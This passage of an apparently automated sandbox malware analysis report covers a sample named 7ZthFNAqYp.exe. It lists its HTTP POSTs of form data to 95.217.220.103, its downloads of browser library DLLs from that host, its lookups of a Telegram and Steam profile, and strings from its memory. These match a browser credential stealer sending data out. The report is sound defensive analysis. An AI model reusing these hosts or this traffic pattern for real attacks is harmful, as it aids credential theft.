Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----KEGDAKEHJDHIDHJJDAEC | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Content-Length: 255 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----KEGDAKEHJDHIDHJJDAEC | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----DGDAEHCBGIIJJJJKKKEH | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Content-Length: 331 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----CFCBFBGDBKJKECAAKKFH | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Content-Length: 332 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----CFIEHCFIECBGCBFHIJJK | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Content-Length: 5461 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /sqlp.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----CFCFHJDBKJKEBFHJEHII | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Content-Length: 829 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----GIIDBGDAFHJDHIDGDGII | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Content-Length: 437 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: POST / HTTP/1.1 | Content-Type: multipart/form-data; boundary=----EHCFBFBAEBKJKEBGCAEH | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Content-Length: 437 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /freebl3.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Connection: Keep-Alive | Cache-Control: no-cache
Source: global traffic, HTTP traffic detected: GET /mozglue.dll HTTP/1.1 | User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 | Host: 95.217.220.103 | Connection: Keep-Alive | Cache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIEGDBAEBFIIDHJJJEBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 1025Connection: Keep-AliveCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFCFHJDBKJKEBFHJEHIIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 95.217.220.103Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                          Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAKJKFHCAEGDHIDGDHDA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 95.217.220.103 Content-Length: 461 Connection: Keep-Alive Cache-Control: no-cache
                          Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDGDAAKFHIEHIECAFBAA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 95.217.220.103 Content-Length: 109281 Connection: Keep-Alive Cache-Control: no-cache
                          Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CFIEHCFIECBGCBFHIJJK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 95.217.220.103 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
                          Source: global traffic HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCAAEGIJKEGHIDGCBAEB User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 95.217.220.103 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
                          Source: unknown TCP traffic detected without corresponding DNS query: 107.191.36.218
                          Source: unknown TCP traffic detected without corresponding DNS query: 95.217.220.103
                          Source: C:\Users\user\Desktop\7ZthFNAqYp.exe Code function: 2_2_00926963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 2_2_00926963
                          Source: global traffic HTTP traffic detected: GET /fun88rockskek HTTP/1.1 Host: t.me Connection: Keep-Alive Cache-Control: no-cache
                          Source: global traffic HTTP traffic detected: GET /profiles/76561199786602107 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
                          Source: global traffic HTTP traffic detected: GET / HTTP/1.1 Host: 107.191.36.218 Connection: Keep-Alive Cache-Control: no-cache
                          Source: global traffic DNS traffic detected: DNS query: t.me
                          Source: global traffic DNS traffic detected: DNS query: steamcommunity.com
                          Source: global traffic DNS traffic detected: DNS query: cowod.hopto.org
                          Source: unknown HTTP traffic detected: POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KEGDAKEHJDHIDHJJDAEC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 95.217.220.103 Content-Length: 255 Connection: Keep-Alive Cache-Control: no-cache
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3262289732.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.drString found in binary or memory: http://ocsp.digicert.com0X
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3262323604.0000000001132000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3215940608.0000000001139000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3412588764.000000003E4BB000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3408547373.00000000325D8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3402404938.000000002078F000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.drString found in binary or memory: http://www.digicert.com/CPS0
                          Source: 7ZthFNAqYp.exe, 7ZthFNAqYp.exe, 00000002.00000002.3417459044.000000006FD7D000.00000002.00000001.01000000.00000008.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3404341759.00000000266F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3402218568.000000002026D000.00000002.00001000.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3399631461.000000001A2C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.sqlite.org/copyright.html.
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: http://www.valvesoftware.com/legal.htm
                          Source: 76561199786602107[1].htm.2.drString found in binary or memory: https://95.217.220.103
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3175941738.0000000001147000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/%
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3277338251.000000000114C000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175798594.0000000001196000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3215990470.0000000001196000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3175887042.0000000001196000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3125256711.0000000001196000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3262340532.0000000001196000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3277209575.0000000001186000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3125794093.0000000001195000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3125916467.0000000001195000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/?
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3125256711.0000000001196000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3125794093.0000000001195000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.3125916467.0000000001195000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/G
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/a
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.000000000109C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/en-GB
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/freebl3.dllO
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/freebl3.dlli
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/mozglue.dll
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/msvcp140.dll
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3262340532.000000000114C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/nss3.dll
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/nss3.dll2
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3262340532.000000000114C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/nss3.dllc
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/nss3.dlln
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/r
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/softokn3.dll
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000AB8000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/sqlp.dll
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2960467392.00000000010B7000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.00000000010B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/v
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.000000000109C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/vcruntime140.dll
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.000000000109C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103/vcruntime140.dllnV
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103AEB
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.0000000000ABE000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://95.217.220.103CAA
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                          Source: 76561199786602107[1].htm.2.drString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001186000.00000004.00000020.00020000.00000000.sdmp, CFCFHJ.2.drString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001115000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001186000.00000004.00000020.00020000.00000000.sdmp, CFCFHJ.2.drString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2799058040.00000000010C5000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.3103179826.00000000011BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.00000000010C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.steamstatic.com/
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/css/applications/community/main.css?v=Pwd1k_5lFECQ&l=en
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/css/globalv2.css?v=dQy8Omh4p9PH&l=english
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/css/promo/summer2017/stickers.css?v=P8gOPraCSjV6&l=engl
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/css/skin_1/header.css?v=pTvrRy1pm52p&l=english
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/css/skin_1/profilev2.css?v=t9xiI4DlPpEB&l=english
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781261554.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/applications/community/libraries~b28b7af69.js?v=
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/applications/community/main.js?v=W9BXs_p_aD4Y&am
                          Source: 7ZthFNAqYp.exe, 00000002.00000003.2781191713.000000000110A000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/applications/community/manifest.js?v=i46kIf4uDBX
                          Source: 7ZthFNAqYp.exe, 00000002.00000002.3394480324.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000002.3393003879.000000000099D000.00000040.00000400.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2960467392.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 7ZthFNAqYp.exe, 00000002.00000003.2799058040.0000000001109000.00000004.00000020.00020000.00000000.sdmp, 76561199786602107[1].htm.2.drString found in binary or memory: https://community.steamstatic.com/public/javascript/global.js?v=7qlUmHSJhPRN&l=english
